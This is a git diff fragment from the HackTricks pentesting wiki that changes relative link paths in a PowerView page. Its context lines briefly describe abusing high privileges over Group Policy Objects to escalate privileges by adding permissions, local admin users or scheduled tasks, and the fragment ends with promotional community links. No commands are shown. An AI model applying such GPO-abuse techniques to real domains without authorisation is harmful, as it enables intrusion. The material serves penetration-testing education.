+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md
index d21934593..b0528bfbe 100644
--- a/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -155,7 +155,7 @@ Get-NetRDPSession -ComputerName #List RDP sessions inside a host (n
 ### Group Policy Object - GPOs
 If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
-For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
+For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
 ```powershell
 #GPO
@@ -193,8 +193,8 @@ Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectNam
 Learn how to **exploit permissions over GPOs and ACLs** in:
-{% content-ref url="../active-directory-methodology/acl-persistence-abuse.md" %}
-[acl-persistence-abuse.md](../active-directory-methodology/acl-persistence-abuse.md)
+{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
+[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
 {% endcontent-ref %}
 ### ACL